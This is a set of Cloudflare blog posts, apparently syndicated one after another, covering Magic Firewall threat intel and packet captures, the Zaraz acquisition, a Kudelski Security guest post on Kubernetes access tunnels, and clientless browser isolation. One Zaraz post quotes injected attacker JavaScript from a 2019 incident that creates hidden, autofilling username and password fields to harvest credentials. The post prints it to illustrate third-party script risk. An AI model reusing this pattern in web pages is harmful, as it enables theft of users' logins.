We talked a lot about firewalls on Monday, including how our firewall-as-a-service solution is very different from traditional firewalls and helps security teams that want sophisticated inspections at the Application Layer. When we talk about the Application Layer, we’re referring to OSI Layer 7. This means we’re applying security features using semantics of the protocol. The most common example is HTTP, the protocol you’re using to visit this website. We have Gateway and our WAF to protect inbound and outbound HTTP requests, but what about Layer 3 and Layer 4 capabilities? Layer 3 and 4 refer to the packet and connection levels. These security features aren’t applied to HTTP requests, but instead to IP packets and (for example) TCP connections. A lot of folks in the CIO organization want to add extra layers of security and visibility without resorting to decryption at Layer 7. We’re excited to talk to you about two sets of new features that will make your lives easier: geo-blocking and threat intel integration to improve security posture, and packet captures to get you better visibility.

Threat Intel and IP Lists

Magic Firewall is great if you know exactly what you want to allow and block. You can put in rules that match exactly on IP source and destination, as well as bitslicing to verify the contents of various packets. However, there are many situations in which you don’t exactly know who the bad and good actors are: is this IP address that’s trying to access my network a perfectly fine consumer, or is it part of a botnet that’s trying to attack my network?

The same goes the other way: whenever someone inside your network is trying to create a connection to the Internet, how do you know whether it’s an obscure blog or a malware website? Clearly, you don’t want to play whack-a-mole and try to keep track of every malicious actor on the Internet by yourself. For most security teams, it’s nothing more than a waste of time! You’d much rather rely on a company that makes it their business to focus on this.

Today, we’re announcing Magic Firewall support for our in-house Threat Intelligence feed. Cloudflare sees approximately 28 million HTTP requests each second and blocks 76 billion cyber threats each day. With almost 20% of the top 10 million Alexa websites on Cloudflare, we see a lot of novel threats pop up every day. We use that data to detect malicious actors on the Internet and turn it into a list of known malicious IPs. And we don’t stop there: we also integrate with a number of third party vendors to augment our coverage.

To match on any of the threat intel lists, just set up a rule in the UI as normal:

Magic Firewall gets Smarter

Threat intel feed categories include Malware, Anonymizer and Botnet Command-and-Control centers. Malware and Botnet lists cover properties on the Internet distributing malware and known command and control centers. Anonymizers contain a list of known forward proxies that allow attackers to hide their IP addresses.

In addition to the managed lists, you also have the flexibility of creating your own lists, either to add your own known set of malicious IPs or to make management of your known good network endpoints easier. As an example, you may want to create a list of all your own servers. That way, you can easily block traffic to and from it from any rule, without having to replicate the list each time.

Another particularly gnarly problem that many of our customers deal with is geo restrictions. Many are restricted in where they are allowed (or want to) accept traffic from and to. The challenge here is that nothing about an IP address tells you anything about the geolocation of it. And even worse, IP addresses regularly change hands, moving from one country to the other.

As of today, you can easily block or allow traffic to any country, without the management hassle that comes with maintaining lists yourself. Country lists are kept up to date entirely by Cloudflare, all you need to do is set up a rule matching on the country and we’ll take care of the rest.

Magic Firewall gets Smarter

Packet captures at the edge

Finally, we’re releasing a very powerful feature: packet captures at the edge. A packet capture is a pcap file that contains all packets that were seen by a particular network box (usually a firewall or router) during a specific time frame. Packet captures are useful if you want to debug your network: why can’t my users connect to a particular website? Or you may want to get better visibility into a DDoS attack, so you can put up better firewall rules.

Traditionally, you’d log into your router or firewall and start up something like tcpdump. You’d set up a filter to only match on certain packets (packet capture files can quickly get very big) and grab the file. But what happens if you want coverage across your entire network: on-premises, offices and all your cloud environments? You’ll likely have different vendors for each of those locations and have to figure out how to get packet captures from all of them. Even worse, some of them might not even support grabbing packet captures.

With Magic Firewall, grabbing packet captures across your entire network becomes simple: because you run a single network-firewall-as-a-service, you can grab packets across your entire network in one go. This gets you instant visibility into exactly where that particular IP is interacting with your network, regardless of physical or virtual location. You have the option of grabbing all network traffic (warning, it might be a lot!) or set a filter to only grab a subset. Filters follow the same Wireshark syntax that Magic Firewall rules use:

(ip.src in $cf.anonymizer)

We think these are great additions to Magic Firewall, giving you powerful primitives to police traffic and tooling to gain visibility into what’s actually going on in your network. Threat Intel, geo blocking and IP lists are all available today — reach out to your account team to have them activated. Packet captures is entering early access later in December. Similarly, if you’re interested, please reach out to your account team!

Why Cloudflare Bought Zaraz

Post Syndicated from Matthew Prince original https://blog.cloudflare.com/why-cloudflare-bought-zaraz/

Why Cloudflare Bought Zaraz

Why Cloudflare Bought Zaraz

Today we’re excited to announce that Cloudflare has acquired Zaraz. The Zaraz value proposition aligns with Cloudflare’s mission. They aim to make the web more secure, more reliable, and faster. And they built their solution on Cloudflare Workers. In other words, it was a no-brainer that we invite them to join our team.

Be Careful Who Takes Out the Trash

To understand Zaraz’s value proposition, you need to understand one of the biggest risks to most websites that people aren’t paying enough attention to. And, to understand that, let me use an analogy.

Imagine you run a business. Imagine that business is, I don’t know, a pharmacy. You have employees. They have a process and way they do things. They’re under contract, and you conduct background checks before you hire them. They do their jobs well and you trust them. One day, however, you realize that no one is emptying the trash. So you ask your team to find someone to empty the trash regularly.

Your team is busy and no one has the time to add this to their regular duties. But one plucky employee has an idea. He goes out on the street and hails down a relative stranger. “Hey,” your employee says to the stranger. “I’ve seen you walking by this way every day. Would you mind stopping in and taking out the trash when you do?”

“Uh”, the stranger says. “Sure?!”

“Great,” your employee says. “Here’s a badge that will let you into the building. The trash is behind the secure area of the pharmacy, but, don’t worry, just use the badge, and you can get back there. You look trustworthy. This will work out great!!”

And for a while it does. The stranger swings by every day. Takes out the trash. Behaves exactly as hoped. And no one thinks much about the trash again.

But one day you walk in, and the pharmacy has been robbed. Drugs stolen, patient records missing. Logs indicate that it was the stranger’s badge that had been used to access the pharmacy. You track down the stranger, and he says “Hey, that sucks, but it wasn’t me”. I handed off that trash responsibility to someone else long ago when I stopped walking past the pharmacy every day.”

And you never track down the person who used the privileged access to violate your trust.

The Keys to the Kingdom

Now, of course, this is crazy. No one would go pick a random stranger off the street and give them access to their physical store. And yet, in the virtual world, a version of this happens all the time.

Every day, front end developers, marketers, and even security teams embed third-party scripts directly on their web pages. These scripts perform basic tasks — the metaphorical equivalent of taking out the trash. When performing correctly, they can be valuable at bringing advanced functionality to sites, helping track marketing conversions, providing analytics, or stopping fraud. But, if they ever go bad, they can cause significant problems and even steal data.

At the most mundane, poorly configured scripts can slow down the rendering pages. While there are ways to make scripts non-blocking, the unfortunate reality is that their developers don’t always follow the best practices. Often when we see slow websites, the biggest cause of slowness is all the third-party scripts that have been embedded.

But it can be worse. Much worse. At Cloudflare, we’ve seen this first hand. Back in 2019 a hacker compromised a third-party service that Cloudflare used and modified the third-party JavaScript that was loaded into a page on cloudflare.com. Their aim was to steal login cookies, usernames and passwords. They went so far as to automatically create username and password fields that would autocomplete.

Here’s a snippet of the actual code injected:

        var cf_form = document.createElement("form");
        cf_form.style.display = "none";
        document.body.appendChild(cf_form);
        var cf_email = document.createElement("input");
        cf_email.setAttribute("type", "text");
        cf_email.setAttribute("name", "email");
        cf_email.setAttribute("autocomplete", "username");
        cf_email.setAttribute("id", "_email_");
        cf_email.style.display = "none";
        cf_form.appendChild(cf_email);
        var cf_password = document.createElement("input");
        cf_password.setAttribute("type", "password");
        cf_password.setAttribute("name", "password");
        cf_password.setAttribute("autocomplete", "current-password");
        cf_password.setAttribute("id", "_password_");
        cf_password.style.display = "none";
        cf_form.appendChild(cf_password);

Luckily, this attack caused minimal damage because it was caught very quickly by the team, but it highlights the very real danger of third-party JavaScript. Why should code designed to count clicks even be allowed to create a password field?

Put simply, third-party JavaScript is a security nightmare for the web. What looks like a simple one-line change (“just add this JavaScript to get free page view tracking!”) opens a door to malicious code that you simply don’t control.

And worse is that third-party JavaScript can and does load other JavaScript from other unknown parties. Even if you trust the company whose code you’ve chosen to embed, you probably don’t trust (or even know about!) what they choose to include.

And even worse these scripts can change any time. Security threats can come and go. The attacker who went after Cloudflare compromised the third-party and modified their service to only attack Cloudflare and included anti-debugging features to try to stop developers spotting the hack. If you’re a CIO and this doesn’t freak you out already, ask your web development team how many third-party scripts are on your websites. Do you trust them all?

The practice of adding third-party scripts to handle simple tasks is the literal equivalent of pulling a random stranger off the street, giving them physical access to your office, and asking them to stop by once a day to empty the trash. It’s completely crazy in the physical world, and yet it’s common practice in web development.

Sandboxing the Strangers

At Cloudflare, our solution was draconian. We ordered that all third-party scripts be stripped from our websites. Different teams at Cloudflare were concerned. Especially our marketing team, who used these scripts to assess whether the campaigns they were running were successful. But we made the decision that it was more important to protect the integrity of our service than to have visibility into things like marketing campaigns.

It was around this time that we met the team behind Zaraz. They argued there didn’t need to be such a drastic choice. What if, instead, you could strictly control what the scripts that you insert on your page did. Make sure if ever they were compromised they wouldn’t have access to anything they weren’t authorized to see. Ensure that if they failed or were slow they wouldn’t keep a page from rendering.

We’ve spent the last half year testing Zaraz, and it’s magical. It gives you the best of the flexible, extensible web while ensuring that CIOs and CISOs can sleep well at night knowing that even if a third-party script provider is compromised, it won’t result in a security incident.

To put a fine point on it, had Cloudflare been running Zaraz then the threat from the compromised script we saw in 2019 would have been completely and automatically eliminated. There’s no way for the attacker to create those username and password fields, no access to cookies that are stored in the user’s browser. The attack surface would have been completely removed.

We’ve published two other posts today outlining how Zaraz works as well as examples of how companies are using it to ensure their web presence is secure, reliable, and fast. We are making Zaraz available to our Enterprise customers immediately, and all other customers can access a free beta version on their dashboard starting today.

If you’re a third-party script developer, be on notice that if you’re not properly securing your scripts, then as Zaraz rolls out across more of the web your scripts will stop working. Today, Cloudflare sits in front of nearly 20% of all websites and, before long, we expect Zaraz’s technology will help protect all of them. We want to make sure all scripts running on our customers’ sites meet modern security, reliability, and performance standards. If you need help getting there, please reach out, and we’ll be standing ready to help: [email protected].

In the meantime, we encourage you to read about how the Zaraz technology works and how customers like Instacart are using it to build a better web presence.

It’s terrific to have Zaraz on board, furthering Cloudflare’s mission to help build a better Internet. Welcome to the team. And in that vein: we’d like to welcome you to Zaraz! We’re excited for you to get your hands on this piece of technology that makes the web better.

Cloudflare acquires Zaraz to enable cloud loading of third-party tools

Post Syndicated from Yair Dovrat original https://blog.cloudflare.com/cloudflare-acquires-zaraz-to-enable-cloud-loading-of-third-party-tools/

Cloudflare acquires Zaraz to enable cloud loading of third-party tools

Cloudflare acquires Zaraz to enable cloud loading of third-party tools

We are excited to announce the acquisition of Zaraz by Cloudflare, and the launch of Cloudflare Zaraz (beta). What we are releasing today is a beta version of the Zaraz product integrated into Cloudflare’s systems and dashboard. You can use it to manage and load third-party tools on the cloud, and achieve significant speed, privacy and security improvements. We have bet on Workers, and the Cloudflare technology and network from day one, and therefore are particularly excited to be offering Zaraz to all of Cloudflare’s customers today, free of charge. If you are a Cloudflare customer all you need to do is to click the Zaraz icon on the dashboard, and start configuring your third-party stack. No code changes are needed. We plan to keep releasing features in the next couple of months until this beta version is a fully-developed product offering.

It’s time to say goodbye to traditional Tag Managers and Customer Data Platforms. They have done their part, and they have done it well, but as the web evolves they have also created some crucial problems. We are here to solve that.

Cloudflare acquires Zaraz to enable cloud loading of third-party tools

The problems of third-party bloat

Yo’av and I founded Zaraz after having experienced working on opposite sides of the battle for third-party tools implementation. I was working with marketing and product managers that often asked to implement just one more analytics tool on the website, while Yo’av was a developer trying to push back due to the performance hit and security risks involved.

We started building Zaraz after talking to hundreds of frustrated engineers from all around the world. It all happened when we joined Y Combinator in the winter of 2020. We were then working on a totally different product: QA software for web analytics tools. On every pitch to a new customer, we used to show a list of the tools that were being loaded on that customer’s site. We also presented a list of implementation bugs related to these tools. We kept hearing the same somewhat unrelated questions over and over: “How come we load so many third-party tools? Are these causing a slowdown? Does it affect SEO? How could I protect my users if one of these tools was hacked?” No one really cared about QA. Engineers asked about the ever-increasing performance hit and security risk caused by third-party tools.

We were not sure about the answers to these questions.  But we realized there might be something bigger hidden behind them. So we decided to do some research. We built a bot and scanned the top-visited 5,000 domains in the US. We loaded them with and without third-party tools and compared the results. On average, third-party tools were slowing down the web by 40%. In the midst of the 2010s, a few years after Google released Tag Manager, engineers often asked us if adding Google Tag Manager (GTM) would slow down their website. No one had a clear answer back then. Google’s official answer was that GTM loads asynchronously, and therefore it should not slow the loading of the “user-visible parts” of the page. We have learned, in the meantime, that’s not at all accurate.

Despite the fact that Google is pushing the market to launch faster websites, often their own stack is what is causing bloat. If you ever used Google PageSpeed Insights, you might have noticed Google pointing out their own tools as problematic in the diagnostic section. Even on Google’s Merchandise Store, which uses mostly Google’s stack of tools (GTM, Analytics, ads, DoubleClick, etc.), third-party tools block the main thread for more or less four seconds. GTM itself is responsible for blocking for more than one second. The latest developments in the field, like the invention of Customer Data Platforms, only made it worse, as more third-party code is now being evaluated and run in the browser than ever before.

The median website in 2021 uses 21 third-party solutions on mobile and 23 on desktop, while in the 90th percentile, these numbers climb to a shocking amount of 89 third-party solutions on mobile, and 91 on desktop. The moment you load tens of third-party tools your website is going to be slow. It will damage important metrics like Total Blocking Time, Time to Interactive, and more. It is, in fact, a losing battle.

In an era where everything is happening online, speed becomes a competitive advantage. In today’s digital climate, it is clear that a faster website affects the bottom line and beats the competition. The latest data published by Google and Deloitte showed that a mere 0.1 second change in load time can influence every step of the user journey, ultimately increasing conversion rates by up to 10% across different industries. Furthermore, Google announced Core Web Vitals last year, a set of metrics to measure speed that affect your SEO rankings.

This multiplicity of tools exposes websites to server security and privacy threats as well. Since most tools ask for remote JavaScript resources, customers can’t keep track of what’s being loaded on their website. And if that’s not enough, many third-party tools call other third-party resources, or redirect HTTP requests to endpoints that you never knew existed. This bad practice exposes your users to malicious threats and too often violates privacy ethics. With the adoption of GDPR, CCPA, and other regulations, that is a painful problem to have.

Trends are pointing towards a big change in how we use third-parties today, especially advertising and marketing tools. Mainstream browsers are forcing built-in strict limitations on usage of third-party cookies. The public is raising concerns about privacy and user consent issues. It’s only a matter of time until marketing and advertising tools will be forced to drop usage of third-party cookies. It will only make sense then to open up their APIs and allow cloud loading for customers. And companies will need to adopt an easy-to-use infrastructure to make this shift. Building this infrastructure on the edge only makes sense, as it needs to run as close as possible to the end user to be performant.

Make your website faster, and secure with Zaraz!

Zaraz can significantly boost a website’s performance by optimizing how it loads third-party tools. Every tool we support is a bit different, but the main idea is to run whatever we can on our cloud backend instead of in the browser. Using the dashboard, customers can implement any type of third-party solution: interactive widgets, analytics tools, advertising tools, marketing automation, CRM tools, etc. The beta version includes a library of 18 third-party tools that you can integrate into your website. In a few clicks, you can start loading a tool entirely on the cloud, without any JavaScript running on the browsers of your end-users. You can learn more about our unique technology in a blog post written by Yo’av Moshe, our CTO.

Moving the execution of third-party scripts away from the browser has a significant impact on page loading times, simply because less code is running in the browser. It also creates an extra layer of security and control over Personal Identifiable Information, Protected Health Information, or other sensitive pieces of information that are often unintentionally passed to third-party vendors. And in the case your site does include some third-party resources, Cloudflare will announce just later today PageShield, a solution to protect your website from potential risks. The two products offer a holistic solution to third-party security and privacy threats.

For customers that would like to test more complex integrations, we offer an Events API, and a set of pre-set variables you can use. This way you can measure conversions or any action taken on your website with context. For current Google Tag Manager users, we have good news: Zaraz offers dataLayer backward compatibility out-of-the-box. You can easily switch from GTM to Zaraz, without needing to change anything in your code base. In the near future we will make it easy to import your current GTM configuration into Zaraz as well.

Cloudflare acquires Zaraz to enable cloud loading of third-party tools

Instacart achieves 0 ms Blocking Time, and increases security with Zaraz

“Leveraging Zaraz Instacart was able to significantly improve performance of our Shopper-specific domains with minimal changes required to the overall site. We had made numerous optimizations to https://shoppers.instacart.com/ but identified third-party tools as the next issue when it came to performance impact. With Zaraz we optimized third-party load times and using Cloudflare Workers we kept the integration on our own subdomain, keeping control of visibility and security.”
Marc Barry, Staff Software Engineer, Cloud Foundations at Instacart

Cloudflare acquires Zaraz to enable cloud loading of third-party tools

No one is more suitable to speak about the benefits of using Zaraz than our customers. Instacart, the leading online grocery platform in North America, has decided to test Zaraz on their shoppers.instacart.com domain. They had two objectives: to increase security and privacy, and to boost page speed (more specifically to improve Total Blocking Time).

For the security and privacy part, the fact that Zaraz, by default, saves no information whatsoever about the end-user, but merely acts as a pipeline, played an important part in their decision to test it. And by preventing third-party scripts from running directly on the browser, they intended to diminish the security risk involved in using third-party tools. To gain even more control, they have decided to use Cloudflare Workers to proxy all the requests to and from the Zaraz service, through their shoppers.instacart.com sub-domain. This gives them complete visibility and control over the process of sending data to third-parties, including Zaraz itself.

Instacart is one of the most tech-savvy companies in the world, and the Shoppers sub-domain was pretty fast to begin with, compared to other websites. They have done a lot to improve its speed metrics before. But they have reached a point where third-party scripts are the main thing slowing it down.

Cloudflare acquires Zaraz to enable cloud loading of third-party tools

As presented in the graph above, launching Zaraz significantly improved page speed for mobile devices. Total Blocking Time decreased from 500 ms to 0 ms. Time to Interactive was improved by 63%, decreasing from 11.8 to 4.26 seconds. CPU Time improved by 60%, from 3.62 seconds to 1.45 seconds. And JavaScript weight shrank by 63%, from 448 KB to 165 KB.

Cloudflare acquires Zaraz to enable cloud loading of third-party tools

We measured significant improvements on the desktop as well. Total Blocking Time decreased from 65 ms to 0 ms. Time to Interactive was improved by 23%, decreasing from 1.64  to 1.26 seconds. CPU Time improved by 55%, from 1.57 seconds to 0.7 seconds. And the JavaScript weight improved by the same amount — from 448 KB to 165 KB.

With more and more industry leaders like Instacart starting to offload tools to the cloud, it’s only a matter of time until most SaaS vendors and startups will start building server-side integrations as complete solutions that run on the edge. Third-party vendors never meant to do harm, they were just lacking the tools to build scalable integrations on the edge. Together with Instacart, we had a chance to connect directly with some vendors, collaborate, and work on finding the most optimized solutions. We are going to put a lot of effort moving forward into collaborating with SaaS companies and vendors, and offer them an easy way to build solutions on the edge. Stay tuned!

The future of Zaraz as a platform

Today marks an important milestone in our company’s life. Our team is happy to join Cloudflare’s office in Portugal where we will keep leading the product development of Zaraz. As part of Cloudflare, we will turn Zaraz into a platform on which third-party vendors can easily build tools and leverage Cloudflare’s global network capabilities. We will lead the entire industry toward adoption of server-side loading of third-party tools and will make it possible for everyone to build better, faster and more secure products easily.

The fact that Zaraz was running entirely on Workers, even before we joined Cloudflare, made the integration simple and fast. As a result, we can quickly move on to building new features until we reach a complete offering and general availability. Cloudflare’s unique, in-house abilities will enable us to make Zaraz even more robust and simplify the onboarding process of new customers. One big improvement we have already achieved is that Cloudflare customers don’t need to make any code changes to use Zaraz. Once it is toggled on, our script will be in-lined directly in the <head> of the HTML. Another exciting point is that the entire service is now running on your own domain.

Furthermore, we are planning to leverage Cloudflare’s expertise to expand our feature set and help our customers deal with more security threats and privacy risks presented by third-party code. One example is adding geolocation triggers, to make it possible to load different tools to end-users who visit your website from different parts of the world. This is needed to stay compliant with different regulations. Another example is the Data Loss Prevention feature, currently used by several of our enterprise customers. The DLP feature scans every request that’s going to a third-party endpoint, to make sure it doesn’t include sensitive information such as names, email addresses, SSN, etc. There are plenty more features in the pipeline.

An influential company like Cloudflare will help us drive positive change in the market, pushing vendors to build on the edge, and companies to adopt cloud loading. We plan to extend our SDK to enable all third-party vendors to build their integrations on our platform and easily run their solutions on the edge, using Workers. Together with Cloudflare, we will play a leading role in the shift to cloud loading of third-party code. It’s time to say goodbye to Tag Managers and Customer Data Platforms. This announcement marks the end of an era. In no time, we are all going to enjoy a browsing experience that’s 40% faster, simply by optimizing how websites load third-party tools.

Offering Zaraz to the millions of Cloudflare’s users from all around the world takes us one step further towards achieving our goal: making the Internet faster and safer, for everyone. We believe that the user experience of any website — small or large — should not be degraded by the use of analytics, chatbots, or any other third-party tool. These tools should improve the user experience, not impair it. And we won’t rest until the entire web shifts to cloud loading of third-party tools, freeing the browser to do what it was initially designed to do: loading websites. We are excited by this future and won’t rest until it’s achieved.

If you would like to explore the free beta version, please click here. If you are an enterprise and have additional/custom requirements, please click here to join the waitlist. To join our Discord channel, click here.

Guest Blog: k8s tunnels with Kudelski Security

Post Syndicated from Guest Author original https://blog.cloudflare.com/guest-blog-zero-trust-access-kubernetes/

Guest Blog: k8s tunnels with Kudelski Security

Guest Blog: k8s tunnels with Kudelski Security

Today, we’re excited to publish a blog post written by our friends at Kudelski Security, a managed security services provider. A few weeks back, Romain Aviolat, the Principal Cloud and Security Engineer at Kudelski Security approached our Zero Trust team with a unique solution to a difficult problem that was powered by Cloudflare’s Identity-aware Proxy, which we call Cloudflare Tunnel, to ensure secure application access in remote working environments.

We enjoyed learning about their solution so much that we wanted to amplify their story. In particular, we appreciated how Kudelski Security’s engineers took full advantage of the flexibility and scalability of our technology to automate workflows for their end users. If you’re interested in learning more about Kudelski Security, check out their work below or their research blog.

Zero Trust Access to Kubernetes

Over the past few years, Kudelski Security’s engineering team has prioritized migrating our infrastructure to multi-cloud environments. Our internal cloud migration mirrors what our end clients are pursuing and has equipped us with expertise and tooling to enhance our services for them. Moreover, this transition has provided us an opportunity to reimagine our own security approach and embrace the best practices of Zero Trust.

So far, one of the most challenging facets of our Zero Trust adoption has been securing access to our different Kubernetes (K8s) control-plane (APIs) across multiple cloud environments. Initially, our infrastructure team struggled to gain visibility and apply consistent, identity-based controls to the different APIs associated with different K8s clusters. Additionally, when interacting with these APIs, our developers were often left blind as to which clusters they needed to access and how to do so.

To address these frictions, we designed an in-house solution leveraging Cloudflare to automate how developers could securely authenticate to K8s clusters sitting across public cloud and on-premise environments. Specifically, for a given developer, we can now surface all the K8s services they have access to in a given cloud environment, authenticate an access request using Cloudflare’s Zero Trust rules, and establish a connection to that cluster via Cloudflare’s Identity-aware proxy, Cloudflare Tunnel.

Most importantly, this automation tool has enabled Kudelski Security as an organization to enhance our security posture and improve our developer experience at the same time. We estimate that this tool saves a new developer at least two hours of time otherwise spent reading documentation, submitting IT service tickets, and manually deploying and configuring the different tools needed to access different K8s clusters.

In this blog, we detail the specific pain points we addressed, how we designed our automation tool, and how Cloudflare helped us progress on our Zero Trust journey in a work-from-home friendly way.

Challenges securing multi-cloud environments

As Kudelski Security has expanded our client services and internal development teams, we have inherently expanded our footprint of applications within multiple K8s clusters and multiple cloud providers. For our infrastructure engineers and developers, the K8s cluster API is a crucial entry point for troubleshooting. We work in GitOps and all our application deployments are automated, but we still frequently need to connect to a cluster to pull logs or debug an issue.

However, maintaining this diversity creates complexity and pressure for infrastructure administrators. For end users, sprawling infrastructure can translate to different credentials, different access tools for each cluster, and different configuration files to keep track of.

Such a complex access experience can make real-time troubleshooting particularly painful. For example, on-call engineers trying to make sense of an unfamiliar K8s environment may dig through dense documentation or be forced to wake up other colleagues to ask a simple question. All this is error-prone and a waste of precious time.

Common, traditional approaches of securing access to K8s APIs presented challenges we knew we wanted to avoid. For example, we felt that exposing the API to the public internet would inherently increase our attack surface, that’s a risk we couldn’t afford. Moreover, we did not want to provide broad-based access to our clusters’ APIs via our internal networks and condone the risks of lateral movement. As Kudelski continues to grow, the operational costs and complexity of deploying VPNs across our workforce and different cloud environments would lead to scaling challenges as well.

Instead, we wanted an approach that would allow us to maintain small, micro-segmented environments, small failure domains, and no more than one way to give access to a service.

Leveraging Cloudflare’s Identity-aware Proxy for Zero Trust access

To do this, Kudelski Security’s engineering team opted for a more modern approach: creating connections between users and each of our K8 clusters via an Identity-aware proxy (IAP). IAPs  are flexible to deploy and add an additional layer of security in front of our applications by verifying the identity of a user when an access request is made. Further, they support our Zero Trust approach by creating connections from users to individual applications — not entire networks.

Each cluster has its own IAP and its own sets of policies, which check for identity (via our corporate SSO) and other contextual factors like the device posture of a developer’s laptop. The IAP doesn’t replace the K8s cluster authentication mechanism, it adds a new one on top of it, and thanks to identity federation and SSO this process is completely transparent for our end users.

In our setup, Kudelski Security is using Cloudflare’s IAPs as a component of Cloudflare Access — a ZTNA solution and one of several security services unified by Cloudflare’s Zero Trust platform.

Guest Blog: k8s tunnels with Kudelski Security

For many web-based apps, IAPs help create a frictionless experience for end users requesting access via a browser. Users authenticate via their corporate SSO or identity provider before reaching the secured app, while the IAP works in the background.

That user flow looks different for CLI-based applications because we cannot redirect CLI network flows like we do in a browser. In our case, our engineers want to use their favorite K8s clients which are CLI-based like kubectl or k9s. This means our Cloudflare IAP needs to act as a SOCKS5 proxy between the CLI client and each K8s cluster.

To create this IAP connection, Cloudflare provides a lightweight server-side daemon called cloudflared that connects infrastructure with applications. This encrypted connection runs on Cloudflare’s global network where Zero Trust policies are applied with single-pass inspection.

Without any automation, however, Kudelski Security’s infrastructure team would need to distribute the daemon on end user devices, provide guidance on how to set up those encrypted connections, and take other manual, hands-on configuration steps and maintain them over time. Plus, developers would still lack a single pane of visibility across the different K8s clusters that they would need to access in their regular work.

Guest Blog: k8s tunnels with Kudelski Security

Our automated solution: k8s-tunnels!

To solve these challenges, our infrastructure engineering team developed an internal tool — called ‘k8s-tunnels’ — that embeds complex configuration steps which make life easier for our developers. Moreover, this tool automatically discovers all the K8s clusters that a given user has access to based on the Zero Trust policies created. To enable this functionality, we embedded the SDKs of some major public cloud providers that Kudelski Security uses. The tool also embeds the cloudflared daemon, meaning that we only need to distribute a single tool to our users.

Guest Blog: k8s tunnels with Kudelski Security

All together, a developer who launches the tool goes through the following workflow: (we assume that the user already has valid credentials otherwise the tool would open a browser on our IDP to obtain them)

1. The user selects one or more cluster to

Guest Blog: k8s tunnels with Kudelski Security

2. k8s-tunnel will automatically open the connection with Cloudflare and expose a local SOCKS5 proxy on the developer machine

3. k8s-tunnel amends the user local kubernetes client configuration by pushing the necessary information to go through the local SOCKS5 proxy

4. k8s-tunnel switches the Kubernetes client context to the current connection

Guest Blog: k8s tunnels with Kudelski Security

5. The user can now use his/her favorite CLI client to access the K8s cluster

The whole process is really straightforward and is being used on a daily basis by our engineering team. And, of course, all this magic is made possible through the auto-discovery mechanism we’ve built into k8s-tunnels. Whenever new engineers join our team, we simply ask them to launch the auto-discovery process and get started.

Here is an example of the auto-discovery process in action.

  1. k8s-tunnels will connect to our different cloud providers APIs and list the K8s clusters the user has access to
  2. k8s-tunnels will maintain a local config file on the user machine of those clusters so this process does not be run more than once
Guest Blog: k8s tunnels with Kudelski Security

Automation enhancements

For on-premises deployments, it was a bit trickier as we didn’t have a simple way to store the K8s clusters metadata like we do with resource tags with public cloud providers. We decided to use Vault as a Key-Value-store to mimic public-cloud resource tags for on-prem. This way we can achieve auto-discovery of on-prem clusters following the same process as with a public-cloud provider.

Maybe you saw that in the previous CLI screenshot, the user can select multiple clusters at the same time! We quickly realized that our developers often needed to access multiple environments at the same time to compare a workload running in production and in staging. So instead of opening and closing tunnels every time they needed to switch clusters, we designed our tool such that they can now simply open multiple tunnels in parallel within a single k8s-tunnels instance and just switch the destination K8s cluster on their laptop.

Last but not least, we’ve also added the support for favorites and notifications on new releases, leveraging Cloudflare Workers, but that’s for another blog post.

What’s Next

In designing this tool, we’ve identified a couple of issues inside Kubernetes client libraries when used in conjunction with SOCKS5 proxies, and we’re working with the Kubernetes community to fix those issues, so everybody should benefit from those patches in the near future.

With this blog post, we wanted to highlight how it is possible to apply Zero Trust security for complex workloads running on multi-cloud environments, while simultaneously improving the end user experience.

Although today our ‘k8s-tunnels’ code is too specific to Kudelski Security, our goal is to share what we’ve created back with the Kubernetes community, so that other organizations and Cloudflare customers can benefit from it.

Introducing Clientless Web Isolation

Post Syndicated from Tim Obezuk original https://blog.cloudflare.com/introducing-clientless-web-isolation-beta/

Introducing Clientless Web Isolation

Introducing Clientless Web Isolation

Today, we’re excited to announce the beta for Cloudflare’s clientless web isolation. A new on-ramp for Browser Isolation that natively integrates Zero Trust Network Access (ZTNA) with the zero-day, phishing and data-loss protection benefits of remote browsing for users on any device browsing any website, internal app or SaaS application. All without needing to install any software or configure any certificates on the endpoint device.

Secure access for managed and unmanaged devices

In early 2021, Cloudflare announced the general availability of Browser Isolation, a fast and secure remote browser that natively integrates with Cloudflare’s Zero Trust platform. This platform — also known as Cloudflare for Teams — combines secure Internet access with our Secure Web Gateway solution (Gateway) and secure application access with a ZTNA solution (Access).

Typically, admins deploy Browser Isolation by rolling out Cloudflare’s device client on endpoints, so that Cloudflare can serve as a secure DNS and HTTPS Internet proxy. This model protects users and sensitive applications when the administrator manages their team’s devices. And for end users, the experience feels frictionless like a local browser: they are hardly aware that they are actually browsing on a secure machine running in a Cloudflare data center near them.

The end-to-end integration of Browser Isolation with secure Internet access makes it easy for administrators to deploy Browser Isolation across their teams without users being aware they’re actually browsing on a secure machine in a nearby Cloudflare data center. However, managing endpoint clients can add configuration overhead for users on unmanaged devices, or contractors on devices managed by third-party organizations.

Cloudflare’s clientless web isolation streamlines connections to remote browsers through a hyperlink (e.g.: https://<your-auth-domain>.cloudflareaccess.com/browser). Once users are authenticated through any of Cloudflare Access’s supported identity providers, the user’s browser uses HTML5 to establish a low-latency connection to a remote browser hosted in a nearby Cloudflare data center without installing any software. There are no servers to manage and scale, or regions to configure.

The simple act of clicking a link in an email, or website causes your browser to download and execute payloads of active web content which can exploit unknown zero-day threats and compromise an endpoint.

Cloudflare’s clientless web isolation can be initiated through a prefixed URL (e.g., https://<your-auth-domain>.cloudflareaccess.com/browser/https://www.example.com). Simply configuring your custom block page, email gateway, or ticketing tool to prefix high-risk links with Browser Isolation will automatically send high risk clicks to a remote browser, protecting the endpoint from any malicious code that may be present on the target link.

Introducing Clientless Web Isolation

Here at Cloudflare, we use Cloudflare’s products to protect Cloudflare, and in fact, use this clientless web isolation approach for our own security investigation activities. By prefixing high risk links with our auth domain, our security team is able to safely investigate potentially malicious websites and phishing sites.

No risky code ever reaches an employee device, and at the end of their investigation, the remote browser is terminated and reset to a known clean state for their next investigation.

Integrated Zero Trust access and remote browsing

The time when corporate data was only accessed from managed devices, inside controlled networks has long since passed. Enterprises relying on strict device posture controls to verify that application access only occurs from managed devices have had few tools to support contractor or BYOD workforces. Historically, administrators have worked around the issue by deploying costly, resource intensive Virtual Desktop Infrastructure (VDI) environments.

Moreover, when it comes to securing application access, Cloudflare Access excels in applying least-privilege, default-deny policies to web-based applications, without needing to install any client software on user devices.

Cloudflare’s clientless web isolation augments ZTNA use cases, allowing applications protected by Access and Gateway to leverage Browser Isolation’s data protection controls such as local printing control, clipboard and file upload / download restrictions to prevent sensitive data from transferring onto unmanaged devices.

Isolated links can easily be added to the Access app launcher as bookmarks allowing your team and contractors to easily access any site with one click.

Introducing Clientless Web Isolation

